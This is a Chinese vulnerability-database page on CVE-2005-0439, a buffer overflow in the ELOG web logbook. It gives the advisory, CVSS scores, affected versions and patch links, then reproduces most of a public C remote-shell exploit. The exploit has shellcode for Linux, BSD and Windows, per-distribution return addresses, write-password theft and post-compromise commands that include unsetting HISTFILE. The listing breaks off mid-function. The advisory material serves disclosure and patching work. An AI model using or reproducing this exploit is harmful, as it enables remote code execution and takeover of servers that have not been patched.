CVE-2005-0439
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2011-03-07 21:20:00
NMCOE    

[原文]Buffer overflow in the decode_post function in ELOG before 2.5.7 allows remote attackers to execute arbitrary code via attachments with long file names.


[CNNVD]ELOG Web Logbook多个远程漏洞(CNNVD-200505-814)

        ELOG的2.5.7之前版本中的decode_post函数存在缓冲区溢出,远程攻击者可以通过带有长文件名的附件来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:stefan_ritt:elog_web_logbook:2.2.2
cpe:/a:stefan_ritt:elog_web_logbook:2.2.3
cpe:/a:stefan_ritt:elog_web_logbook:2.1.1
cpe:/a:stefan_ritt:elog_web_logbook:2.5
cpe:/a:stefan_ritt:elog_web_logbook:2.2.1
cpe:/a:stefan_ritt:elog_web_logbook:2.4
cpe:/a:stefan_ritt:elog_web_logbook:2.0.2
cpe:/a:stefan_ritt:elog_web_logbook:2.0.4
cpe:/a:stefan_ritt:elog_web_logbook:2.0.5
cpe:/a:stefan_ritt:elog_web_logbook:2.1.0
cpe:/a:stefan_ritt:elog_web_logbook:2.0.1
cpe:/a:stefan_ritt:elog_web_logbook:2.0.3
cpe:/a:stefan_ritt:elog_web_logbook:2.5.6
cpe:/a:stefan_ritt:elog_web_logbook:2.2.4
cpe:/a:stefan_ritt:elog_web_logbook:2.0.0
cpe:/a:stefan_ritt:elog_web_logbook:2.1.2
cpe:/a:stefan_ritt:elog_web_logbook:2.1.3
cpe:/a:stefan_ritt:elog_web_logbook:2.2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0439
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0439
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-814
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/12556
(PATCH)  BID  12556
http://sourceforge.net/project/shownotes.php?group_id=40505&release_id=304880
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?group_id=40505&release_id=304880
http://midas.psi.ch/elogs/Forum/941
(VENDOR_ADVISORY)  CONFIRM  http://midas.psi.ch/elogs/Forum/941
http://xforce.iss.net/xforce/xfdb/19313
(UNKNOWN)  XF  elog-weblog-bo(19313)

- 漏洞信息

ELOG Web Logbook多个远程漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2006-02-14 00:00:00
远程  
        ELOG的2.5.7之前版本中的decode_post函数存在缓冲区溢出,远程攻击者可以通过带有长文件名的附件来执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Elog Web Logbook Elog Web Logbook 2.0 .0
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.0.1
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.0.2
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.0.3
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.0.4
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.0.5
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.1 .0
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.1.1
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.1.2
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.1.3
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.2 .0
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.2.1
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.2.2
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.2.3
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.2.4
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.4
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        Elog Web Logbook Elog Web Logbook 2.5
        Elog Web Logbook elog-2.5.7-1.tar.gz
        http://prdownloads.sourceforge.net/elog/elog-2.5.7-1.tar.gz?download
        

- 漏洞信息 (805)

ELOG <= 2.5.6 Remote Shell Exploit (EDBID:805)
multiple remote
2005-02-09 Verified
8080 n4rk0tix
N/A [点击下载]
/* Worked on latest version for me 
 * http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
 * elog-latest.tar.gz      26-Jan-2005 21:36  519K
 * Default port 8080.
 * str0ke */

/*                                                                      
    
Hi there, someone has brought to u a gift.
 
     ELOG Remote Shell Exploit <= 2.5.6 (Also for future Versions)
 
      Updated On 18/April/2004

      LOCK YOUR LOGBOOKZ, THERE IS A SPY IN THE WILD! 

 Bug: Sorry, we do not support fool-disclosure.

 Characteristicz : Fully Automated Filling Mechanism ,steal/decode base_64 ELOG _write_ passwordz.
                   (breakin into write password protected servers,)
 
 Targeting : objdump -t elogd | grep _mtext   <----- your magic jumping addres.
             change that value with one of the targets below .If The ret lookz like 0x09..  
             then that means elogd version is 2.5.5 or greater.If 0x8.. then < 2.5.5
             NOte: The buffer-length in linux, varies from one distro to other, like the BSD one.
              so do not add shit to the target area unless as well as u know what u r doing.

 Tricks   i : Some hosts using Elog daemon under Apache mod_proxy module,
              so u'd better  force a bit yourself port scan that host in order to get the elog port.
              (Be warned , most of the serverz we owned had at least 2 running elog http servers.)              

         ii : If U can _not_ get the write pazzword for logbook, then try other logbooks.
		        (especially, happens when the background mode enabled).


        iii : If u happen to meet logbook which has more than 10 attribute/optionz
              then add more globalz to the global sectionz of this code,now it supportz 
              10 att/opt, i haven't seen more than this Yet!.

Challange: Find the other 2 heap and a 1 url traversal bugs in elogd.(Both exploitable)
 
Finally A big FUCK to the Sn2 for leaking this code to the public.

 Unknown u.g Bl4ckh4t group member[3]



                        nrktx                                    DIGITALLY SIGNATURED

_EOC_

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <ctype.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <err.h>

#define _GNU_SOURCE
#define CONTSIZE            10000
#define BOUNSIZE            100
#define REQUESTSIZE         2000
#define INBUF               5000
#define LINEBUFSIZ          1000
#define GETBUFSIZE          10000
#define SENDBUFSIZE         10000
#define TIMEOUT             30
#define ENURLSIZE           200
#define GLOBATTSIZE         200
#define STORESIZE           10000
#define ELOGPORT            8080
#define SHBUFSIZE           288
#define BIGBUFSIZE          5000
#define BACKDOOR            31337
#define BSDBACKDOOR         11520
#define WINBACKDOOR         5555
#define NOP                 0x90
#define RED                 "\033[31m"
#define GREEN               "\033[32m"
#define DEFAULT             "\033[0m"
#define CHECKELOG           "HEAD HTTP/1.1"
#define HTTPVER             " HTTP/1.1\r\n"
#define POSTREQ             "POST /"
#define GETREQ              "GET /"
#define GETREQCMD           "?cmd=download"           
#define TESTUSER            "candy-n4rk0tix"
#define TESTPASS_DECODED    "candy-blackhat"
#define ADDICTEDZ           "candy:narkotix"
#define EXPERIMENT          "iloveucandy"
#define LOGBOOKAUTHOR       "CodeName : Candy-bl4ckh47"
#define LOGSUBJECT          "Mission Impossible"
#define ATT_FILE            "do-NOT-trust-me-biatch"
#define MSGCONTENT          "Building Required HTML CONTENT"
#define MSGQUERY            "Building Required HTML QUERY"
#define MSGVER              "Asking For Version..."
#define MSGBOUNDARY         "Building Random BOUNDARY.."
#define MSGSECTOR           "Checking IF Sector Is CLEAR.."
#define READOPTION          "Getting Required Attr Options BE PATIENT !"
#define PASSALERT           "LogBook Is Write Password Protected"
#define GETINGPASS          "Wait Bro We R Gonna Catch The Password"
#define PASSSUCCESS         "WE GOT The Write Password Bro !!"
#define CLEARAREA           "[SECTOR CLEAR.. FORCING OUR LUCK TO GET IN]"
#define NODATA              "EOF"
#define PASSFAILED          "Could not get password, Prolly Elogd started with -D arg !"
#define DEMOLOGBOOK         "demo"
#define UPLOADME            1
#define NOTUPLOADME         0
#define VERSION_CHECKER     "Server: ELOG HTTP "
#define AUTHORIZED_DENY     "401 Authorization Required"
#define SECTOR_CLEAR        "302 Found"
#define INVALIDURL          "Invalid URL"
#define ATTERR              "Error: Attribute "
#define ATTOPTERR           "Error: Attribute option "
#define ATTERRTAG           "<b>"
#define ATTERRTAGLAST       "</b>"
#define ATTNOTFOUND(x)      {fprintf(stderr,"[!] Attribute %s Notfound\n",x);}
#define MAKINGATT(x)        {fprintf(stderr,""GREEN"[+]"DEFAULT" Attribute %s ADDING..\
                             \t"GREEN"DONE"DEFAULT"\n",x);}
#define NOTELOG             "Remote Server Is NOT Elog !"
#define REMDOWN             "Connection reset by Peer"
#define REMCRASHED          "Server DEAD"
#define BIGOPTIONLIST       "Too Many Attributes Dude,MODIFY THE CODE !"
#define ASKEDPASS           "Please enter password to obtain write access"
#define ALLOCGLOB(x)        {x = (char *)malloc(GLOBATTSIZE *sizeof(char));}
#define ZEROGLOB(x)         { memset(x,'\0',GLOBATTSIZE);}
#define PRINTINFO(x,y)      {if(y <= 1) printf(""GREEN"[+]"DEFAULT" %s\n",x);}                         
#define NPRINTINFO(x)       {printf("[-] %s\n",x);}
#define LOGBOOKNOTFOUND(x,y)  {bzero(x,sizeof(x));\
                               sprintf(x,"Error: logbook \"%s\" not defined",y);\
                              }
#define BADSELECT           "option value=\"\">"
#define COMMAND             "echo         '---[WE NEVER BELIEVE IN LUCK]---'; uptime ; uname -a ; id;"\
                            "TERM=xterm; export TERM; who ; unset HISTFILE\n"
#define WINCMD              "echo '----WE PWNED U DUDE---' & hostname\n "
char                        *map = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
char                        content[CONTSIZE];  
static  int                 content_length;
static  unsigned char       boundary[BOUNSIZE];
char                        encoded_url[ENURLSIZE];
static int                  globcount = 0;
static int                  debug     = 1;
static int                  recount   = 0;
int                         id        = 0;
char                        wpassbufdec[50] = {'\0'};
char                        wpassbufenc[50] = {'\0'};
char                        userandpass[50] = ADDICTEDZ;
char                        encuserandpass[50] = ADDICTEDZ;
char                        bigbuffer[BIGBUFSIZE];
char                        shbuffer     [288];
char                        fedorabuf    [288];
char                        debianbuffer [264];
char                        windozebuf   [246];
char                        windozetext  [600];

static unsigned char glob1_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob2_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob3_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob4_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob5_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob6_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob7_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob8_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob9_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob10_att[GLOBATTSIZE] = {'\0'};

static unsigned char glob1_opt[GLOBATTSIZE] = "Other";
static unsigned char glob2_opt[GLOBATTSIZE] = "Other";
static unsigned char glob3_opt[GLOBATTSIZE] = "Other";
static unsigned char glob4_opt[GLOBATTSIZE] = "Other";
static unsigned char glob5_opt[GLOBATTSIZE] = "Other";
static unsigned char glob6_opt[GLOBATTSIZE] = "Other";
static unsigned char glob7_opt[GLOBATTSIZE] = "Other";
static unsigned char glob8_opt[GLOBATTSIZE] = "Other";
static unsigned char glob9_opt[GLOBATTSIZE] = "Other";
static unsigned char glob10_opt[GLOBATTSIZE] = "Other";

 struct globalz
   {
    char *addr;
    int  id;
    };
 
 struct target
   {
    char *distro;
    long ret;
    int   id;
    };

 struct target TARGETZ[] =
{
    {"Slackware 9.1"       , 0x08629588 , 0},
    {"Gentoo 3.3.5-r1 "    , 0x09093f40 , 1},  /* 0x08624572 for Gentoo 3.3.2 */
    {"FreeBSD 4.9 STABLE " , 0x0906aa24 , 2},
    {"Mandrake 10.1"       , 0x085dd70a , 3},
    {"Fedora Core 1"       , 0x08624600 , 4},  /* Fedora sux, Inferno  Rulez*/
    {"Debian 3.0   "       , 0x085e0420 , 5},  /* 2.5.6-1 - 0x090853e0 /str0ke */ 
    {"WinXP SP2 Elog-2.5.6", 0x0055D9F0 , 6},  /* Fuck that NULL byte, it is innocent */
    {"Redhat 7.3   "       , 0x85dd3c0  , 7},
    {"Redhat E.L   "       , 0x090653a0 , 8},
    {"Slackware 10 "       , 0x09064c80 , 9},    
    {"FreeBSD 5.2  "       , 0x090673c0 , 10},
    {"FreeBSD 5.3 STABLE"  , 0x090658e0 , 11},
    {"NULL         "       , 0x0        , -1},
};   

struct globalz MISSED[]=
{
    {(char *)&glob1_att,          0},
    {(char *)&glob2_att,          0},
    {(char *)&glob3_att,          0},
    {(char *)&glob4_att,          0},
    {(char *)&glob5_att,          0},
    {(char *)&glob6_att,          0},
    {(char *)&glob7_att,          0},
    {(char *)&glob8_att,          0},
    {(char *)&glob9_att,          0},
    {(char *)&glob10_att,         0},
    { NULL              ,         0},
};

struct globalz TRASH[]=
{
    {(char *)&glob1_opt,          0},
    {(char *)&glob2_opt,          0},
    {(char *)&glob3_opt,          0},
    {(char *)&glob4_opt,          0},
    {(char *)&glob5_opt,          0},
    {(char *)&glob6_opt,          0},
    {(char *)&glob7_opt,          0},
    {(char *)&glob8_opt,          0},
    {(char *)&glob9_opt,          0},
    {(char *)&glob10_opt,         0},
    {NULL               ,         0}
};


/*linux portbind 31337*/
char lnx_shellcode[] =
                        "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1"
                        "\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x7a\x69"
                        "\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1"
                        "\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43"
                        "\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0"
                        "\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41"
                        "\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68"
                        "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1"
                        "\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\x90\x90\x90\x90";
                        
/*BSD portbind */
char bsd_shellcode[] =
   
                        "\x31\xc0\x99\x52\x42\x52\x42\x52\x50\xb0\x61"
                        "\xcd\x80\x6a\x2d\x66\x52\x89\xe3\x6a\x10\x53"
                        "\x50\x50\xb0\x68\xcd\x80\x5b\x50\x53\x50\xb0"
                        "\x6a\xcd\x80\xb0\x1e\xcd\x80\x52\x50\x52\xb0"
                        "\x5a\xcd\x80\x4a\x79\xf6\x68\x6e\x2f\x73\x68"
                        "\x68\x2f\x2f\x62\x69\x89\xe3\x50\x54\x53\x53"
                        "\xb0\x3b\xcd\x80\x90\x90\x90\x90\x90\x90\x90";
/*Win2k portbind 5555*/
char win_shellcode[] =
                       "\x66\x81\xec\x04\x07"
                       "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31"
                       "\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc"
                       "\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25"
                       "\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b"
                       "\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b"
                       "\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17"
                       "\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25"
                       "\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d"
                       "\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d"
                       "\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76"
                       "\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda"
                       "\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72"
                       "\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d"
                       "\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda"
                       "\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8"
                       "\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61"
                       "\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75"
                       "\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50"
                       "\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70"
                       "\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d"
                       "\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24"
                       "\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d"
                       "\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4"
                       "\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21"
                       "\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25";


char                       *make_http_content(int  ,  char*);
char                       *make_random_boundary    (void);
char                       *make_request_header(char *,char *,int);
char                       *urlencode  (char *);
void                       base64_encode     (char *, char *);
void                       get_server_version(char *, unsigned short int);
void                       base64_decode     (char *, char *);
void                       get_missing_attributes  (char *, char *,char *);
void                       alloc_all_globalz   (void);
void                       re_check_sector (char *,unsigned short,char *,int);
void                       spy_attr_options (char *,unsigned short int, char *);
void                       make_spy_header(char *,short, char *,char *);
void                       crack_the_code (char *,unsigned short, char *);
void                       authorize_user(char * , char *);
void                       build_att_buffer (int , int);
void                       do_last_stage   ( char *  ,short  ,   char *);
void                       we_r_coming     (char* );
void                       shell(int sock);
void                       banner(void);
void                       usage(char *);
void                       listos(void);
long                       get_host_ip (char *);
int                        cind    (char c);
int                        is_there_attribute  (void);
int                        check_for_clear_sector (char *,unsigned short int,char *,int);


int main             (int argc , char *argv[])
{
   int       flg;
   int       port      = ELOGPORT;
   int       uniz      = 0;
   char      *logbook  = DEMOLOGBOOK;
   char      *hostname = NULL;
   char      *u_name   = TESTUSER;
   char      *u_pwd    = TESTPASS_DECODED;
   char      *write_pazzword = NULL;

   banner();
    while((flg = getopt(argc,argv,"h:p:l:o:w:u:r:dD")) !=EOF)
      {
        switch(flg)
         {
          case 'h':
               hostname = strdup(optarg);
               break;
          
          case 'p':
               port = atoi(optarg);
               break;

          case 'l':
               logbook = strdup(optarg);
               break;

          case 'o':
               id      = atoi(optarg);
                if((id == 2) || (id == 10) || (id == 11)){
                uniz++;
                break;}
                if(id == 6)
                uniz = 2;
               break;

          case 'd':
               listos();
               exit(1);
          
          case 'u':
               u_name  = strdup(optarg);
               break;

          case 'r':
               u_pwd   = strdup(optarg);
               break;

          case 'w':
               write_pazzword = strdup(optarg);
               strncpy(wpassbufdec,write_pazzword,49);
               break;

          default :
               usage(argv[0]);
               
         }
      }           

          if(!hostname)
             exit(1);
           printf(""GREEN"[+]"DEFAULT" Exploiting on %s : 0x%lx\n",TARGETZ[id].distro,TARGETZ[id].ret);
           alloc_all_globalz();
           build_att_buffer(uniz,id);
           authorize_user(u_name , u_pwd);
           get_server_version(hostname,port);
           check_for_clear_sector(hostname,port,logbook,0);
return(0);
}




void         base64_encode(char *s, char *d)
{
   unsigned int t, pad;

   pad = 3 - strlen(s) % 3;
   if (pad == 3)
      pad = 0;
   while (*s) {
      t = (*s++) << 16;
      if (*s)  
         t |= (*s++) << 8;
      if (*s)  
         t |= (*s++) << 0;
      
      *(d + 3) = map[t & 63];
      t >>= 6;  
      *(d + 2) = map[t & 63];
      t >>= 6;
      *(d + 1) = map[t & 63];
      t >>= 6;
      *(d + 0) = map[t & 63];
  
      d += 4;
   }
   *d = 0;
   while (pad--)

      *(--d) = '=';
}


void        base64_decode(char *s, char *d)
{
   unsigned int t;
                     
   while (*s) {
      t = cind(*s) << 18;
      s++;
      t |= cind(*s) << 12;
      s++;
      t |= cind(*s) << 6;
      s++;
      t |= cind(*s) << 0;
      s++;
      
      *(d + 2) = (char) (t & 0xFF);
      t >>= 8;
      *(d + 1) = (char) (t & 0xFF);
      t >>= 8;
      *d = (char) (t & 0xFF);
      
      d += 3;
   }
   *d = 0;
}

int                   cind(char c)
{  
   int i;
   
   if (c == '=')
      return 0;
   
   for (i = 0; i < 64; i++)
      if (map[i] == c)
         return i;
   
   return -1;
}

void             get_server_version(char *hostname,unsigned short port)
 {
   const unsigned char *version_chec = VERSION_CHECKER;
   const unsigned char *version_request = CHECKELOG;
   int          yes = 1;
   int          get_total = 0;
   int          send_total = 0;
   char         info_buf[INBUF];
   int          sock_req;
   int          ready;   
   struct sockaddr_in rem_addr;
   fd_set             read_fd;
   struct timeval     w_t;
     
     w_t.tv_sec  = TIMEOUT;
     w_t.tv_usec = 0;
     
   PRINTINFO(MSGVER,1);
 
           sock_req = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
             if(sock_req < 0) {
             perror("socket");
             exit(EXIT_FAILURE);
             }
          if(setsockopt(sock_req,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1)
          { perror("setsockopt");
          exit(1);
          }
   
           memset(&(rem_addr.sin_zero),'\0',8);
           rem_addr.sin_family = AF_INET;
           rem_addr.sin_port   = htons(port);
           rem_addr.sin_addr.s_addr = get_host_ip(hostname);            
      
               if( connect(sock_req,(struct sockaddr *)&rem_addr,sizeof(struct sockaddr)) == -1)
                { 
                err(1,NULL);
                exit(1);
                }
     
          FD_ZERO(&read_fd);
          FD_SET(sock_req,&read_fd);
          
               if ((send_total = send(sock_req,version_request,strlen(version_request),0)) == -1)
                {
                perror("send");
                exit(1);
                }
         if((ready = select(sock_req+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){
             perror("select");
             exit(1);
             }
         if(FD_ISSET(sock_req,&read_fd))
          {
               if( (get_total = recv(sock_req,info_buf,sizeof(info_buf)-1,0)) == -1)
                {
                perror("recv");
                exit(1);
                }
                  else if(get_total <= 0){
                  fprintf(stderr,"[-]Can not receive information\n");
                  exit(1);
                  }
          info_buf[get_total] = '\0';
          int i;
          char             linebuf[LINEBUFSIZ];
          char             lastbuf[LINEBUFSIZ];
          bzero(linebuf,sizeof(linebuf));
          bzero(lastbuf,sizeof(lastbuf));

          char *p = (char *)&linebuf[0];
          char *k = (char *)&lastbuf[0];
   
          char *z;
             if((z = strstr(info_buf,version_chec)) != NULL) 
              {
                strncpy(p,z,500);
                  for(i = 0; (*p != '-') && (*p != '\n'); i++){  
                   *k++ = *p++;
                   }
              PRINTINFO(lastbuf,debug);
              close(sock_req); 
              return; 
              }
          }
           NPRINTINFO(NOTELOG);
           close(sock_req);
           exit(1);
 }



char                    *make_random_boundary(void)
 {
        PRINTINFO(MSGBOUNDARY,debug); 
        char          bound_buf[BOUNSIZE];
        char          *p;
        p = bound_buf;
        srand((unsigned) time(NULL));
    
         bzero(bound_buf,sizeof(bound_buf));
         sprintf(bound_buf,"---------------------------%04X%04X%04X",rand(),rand(),rand());
         return(p);
 }




char                    *make_http_content(int choice,char *logbookname) 
 {
  char                 *pazzword   = TESTPASS_DECODED;
  char                 passencode[50];
  char                 *text       = NULL;
  const char           *experiment = logbookname;
  const char           *att_file   = shbuffer;
  const char           *testuser   = TESTUSER;
  const char           *subject    = LOGSUBJECT;
  char                 *l_content  = content;
  int                  include_evilfile = 0;
  int                  attrcount = 0;
  int                  j;    
                if(choice == UPLOADME)
                include_evilfile = 1;
                else if (choice == NOTUPLOADME)
                include_evilfile = 0;
 
     if(id == 4)
     att_file = fedorabuf;
     if((id == 5) || (id == 2))
     att_file = debianbuffer;
     if(id == 6){
     att_file = windozebuf;
     text     = windozetext;
     }
     if(id != 6)
     text = bigbuffer;
     sprintf(boundary,"%s",make_random_boundary());

     PRINTINFO(MSGCONTENT,debug);

     base64_encode(pazzword,passencode);


  strcpy(content,boundary);

  strcat(content, "\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nSubmit\r\n");
  
  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"wpwd\"\r\n\r\n%s\r\n",boundary,wpassbufenc); 

  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"unm\"\r\n\r\n%s\r\n",boundary,testuser);

  
  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"upwd\"\r\n\r\n%s\r\n", boundary, passencode);
  
  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"exp\"\r\n\r\n%s\r\n", boundary, experiment);


    if((attrcount = is_there_attribute())) {
      for( j = 0; j < attrcount ; j++) {
  
  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n", 
           boundary,MISSED[j].addr,TRASH[j].addr);
         }
      }

  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"Subject\"\r\n\r\n%s\r\n", boundary, subject);

  
  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"Text\"\r\n\r\n%s\r\n", boundary, text);

   if(include_evilfile){  

  sprintf(content + strlen(content),
          "%s\r\nContent-Disposition: form-data; name=\"attfile\";filename=\"%s\"\r\n", boundary, att_file);
  }
  
  sprintf(content + strlen(content),"%s\r\n", boundary);
 

                   content_length = strlen(content);
                   content[content_length] = '\0';
                   return(l_content);
}



char                *urlencode(char *str)
{
   char             *p;
   char *s          = encoded_url;
   p                = str;
   char             *encoded = encoded_url;

            bzero(encoded_url,sizeof(encoded_url));
 
            if(index(str,' ') == NULL) {
             return(str);
            }
              while(*p && (int) s < (int) encoded_url + 50 ) {
                *s = *p;
                  if(*p == ' '){
                   *s = '+';
                  }   
                s++;
                p++;
}

return(encoded);
}



char                *make_request_header(char *logbookname,char *glob_boundary,int which)
 {
  glob_boundary       = boundary;
  char                request[REQUESTSIZE];
  char                *p = request;
  char                boun_buf[BOUNSIZE];
  char                host_name[50];
  char                *url_enc = urlencode(logbookname);
  
  
              if(gethostname(host_name,sizeof(host_name)) == -1)
                { perror("gethostname");
                  exit(EXIT_FAILURE);
                }
                sprintf(boun_buf,"%s",boundary);

             if(which){  
              PRINTINFO(MSGQUERY,debug);
              }
  strncpy(request,POSTREQ,sizeof(POSTREQ));
  sprintf(request + strlen(request), "%s/",url_enc);
  strcat(request,HTTPVER);
  sprintf(request + strlen(request), "Content-Type: multipart/form-data; boundary=%s\r\n",glob_boundary);
  sprintf(request + strlen(request), "Host: %s\r\n", host_name);
  sprintf(request + strlen(request), "User-Agent: ELOG\r\n");
